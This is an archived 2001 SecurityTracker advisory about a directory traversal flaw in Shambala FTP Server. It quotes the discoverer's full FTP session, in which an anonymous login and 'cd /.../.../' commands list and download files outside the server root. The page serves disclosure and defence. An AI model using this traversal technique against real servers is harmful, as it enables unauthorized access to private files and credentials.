SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
About the Archives
Want to learn about the SecurityTracker archives? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (File Transfer)  >  Shambala Server Vendors:  Evolvable Corporation
Shambala FTP Server Gives Remote Users Access to Any Files on the FTP Server's Drive
Date:  Jun 7 2001 18:28 (UTC/GMT)
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  A vulnerability has been reported in the Shambala FTP server that allows remote users to access files on the server located outside of the server's root directory.

A remote user can change to any directory and view files.

If a remote user sends the command "CWD ..." (or "cd ..." in the default FTP client), the server will change directories up to the higher level directory.

A transcript of a demonstration exploit scenario is provided in the Source Message.
Impact:  A remote user can traverse the directory tree on the target FTP server and obtain files on the server that are located outside of the FTP server's root document directory.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.evolvable.com/ (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)
Reported By:  alt3kx! <alt3kx@raza-mexicana.org>
Message History:   None.

 Source Message Contents
Date:  Thu, 07 Jun 2001 14:04:57 -0400
From:  alt3kx! <alt3kx@raza-mexicana.org>
Subject:  Shambala FTP server Directory Traversal

 

This is a multi-part message in MIME format.
--------------33B0A33A1FE995217D8106E9
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


======================================================================


	        Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas weyete!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug  allows  any user to change to any directory and see files to PATH
also GET files remotely.

----------------------------=[Plataforms]=-----------------------------

Windows 9.x
Windows NT
windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  d---------    owner    group          0   21-maj-01 17:50   1.xx.xx.xx
  ----------    owner    group        283   21-maj-01 17:55   
index-_-1_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-2_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-3_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-4_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-5_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-6_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-7_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-8_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-9_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-10_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-11_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-12_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-13_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-14_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-15_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-16_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_0_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_0_0_-1.htm
  ----------    owner    group        283   21-maj-01 17:55   .htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-2.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-3.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-4.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-5.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-6.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-7.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-8.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-9.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-10.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-12.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_-1_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_1_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group      15444   04-maj-01 14:26   SCAN.log
  ----------    owner    group     140340   04-maj-01 14:05   
MAILS-PRESIDENCIA.txt
  ----------    owner    group     466944   18-sep-99 09:32   Shambala.exe
  ----------    owner    group       3564   21-maj-01 17:48   ST6UNST.LOG
  ----------    owner    group         31   21-maj-01 17:50   
passwordsxxx.txt
  d---------    owner    group          0   21-maj-01 17:50   Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group     246928   18-jan-01 13:10   N6Setup.exe
  d---------    owner    group          0   18-jan-01 15:39   Netscape 6
  d---------    owner    group          0   18-jan-01 14:50   Netscape 6 
Setup
  ----------    owner    group    3209110   19-jan-01 10:51   getrgt.exe

 
 
 
 
 

  ----------    owner    group        168   21-maj-01 19:07   
raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recomended action is to changue the persmissions or define
individual directory for users anonymous with files not compromise.


-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com







--------------33B0A33A1FE995217D8106E9--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2001, SecurityGlobal.net LLC